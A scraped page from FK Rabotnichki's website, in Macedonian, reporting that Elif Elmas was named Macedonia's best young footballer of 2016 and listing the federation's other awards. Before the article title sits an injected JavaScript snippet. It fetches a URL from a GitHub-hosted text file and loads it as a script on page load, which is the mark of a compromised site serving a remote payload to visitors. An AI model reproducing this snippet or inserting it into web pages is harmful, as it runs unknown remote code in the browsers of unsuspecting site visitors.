;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Елиф Елмас е најдобар млад фудбалер на Македонија за 2016 година!
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Елиф Елмас е најдобар млад фудбалер на Македонија за 2016 година!

Како и секоја година ФК Работнички е неизбежен дел од најдобрите во македонскиот фудбал. Овој пат, младинскиот репрезентативец Елиф Елмас доби признание за најдобар млад фудбалер во Македонија за изминатава година во изборот на Фудбалската федерација на Македонија кој се одржа во Македонскиот народен театар.

„Сакам да искажам голема благодарност за ФФМ за доделеното признание, но пред се на мојот клуб Работнички, на моите соиграчи и стручен штаб без кои сигурно немаше да стигнам до ова признание. Оваа награда ја посветувам на моето семејство“ – истакна најдобриот млад фудбалер во Македонија, Елиф Елмас, по добивањето на признанието.

Во младинските категории, епитетот најдобар клуб го понесе ФК Вардар, а најдобар тренер Југослав Тренчовски од ФК Академија Пандев.

Најдобар фудбалер од домашното првенство за сезоната 2015/2016 е Бесарт Ибраими, најдобар репрезент во странство – Илија Несторовски од Палермо, а најдобар тренер Благоја Милевски. Специјална награда оваа година ФФМ додели за комплетната млада репрезентација на Македонија која се избори за историскиот пласман на Европското првенство 2017 во Полска.